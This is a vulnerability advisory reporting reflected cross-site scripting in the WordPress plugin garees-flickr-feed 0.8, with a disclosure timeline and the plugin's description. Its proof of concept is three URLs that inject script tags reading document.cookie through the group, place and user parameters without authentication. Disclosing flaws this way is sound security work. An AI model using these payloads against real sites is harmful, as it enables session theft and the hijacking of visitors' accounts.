wp-plugin : garees-flickr-feed | Code Vigilant : to err is human.. To fix is Humanity

wp-plugin : garees-flickr-feed
Plugin Details

Plugin Name: wp-plugin : garees-flickr-feed

Effected Version : 0.8 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Identified by : anantshri

WPScan Reference URL

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/garees-flickr-feed/garees_flickr_feed_findgroups.php?group=group'><script>alert(document.cookie)</script>&
http://localhost/wp-content/plugins/garees-flickr-feed/garees_flickr_feed_findplaces.php?place=place'><script>alert(document.cookie)</script>&
http://localhost/wp-content/plugins/garees-flickr-feed/garees_flickr_feed_findusers.php?user=user'><script>alert(document.cookie)</script>&

Vulnerable Parameter : group, place, user

Type of XSS : Reflected

Disclosure Timeline

Vendor Contacted : 2014-01-05

Plugin Status : Updated on

Public Disclosure : July 7, 2014

CVE Number :

Plugin Description :

[|
    *Garee's Flickr Feed* is a highly customizable Wordpress-plugin that integrates pictures from flickr on your blog.
    The output is generated from template-files or your own templates, which you can write with Mustache.
    
    For more information check out the official [plugin-site](http://www.garee.ch/wordpress/garees-flickr-feed/)
    
    
    Main-advantages:
    
    * Flickr-requests are cached
    * CSS only included if shortcode found on page
    * highly customizable with Mustache-templates</li>
    
    Just insert the shortcode anywhere on your blog: `[flickr_feed]`
    
    Use shortcode-options to further customize which content and how they should be displayed. Check out the examples on the [live-demo](http://www.garee.ch/wordpress/garees-flickr-feed/live-demo/)	
]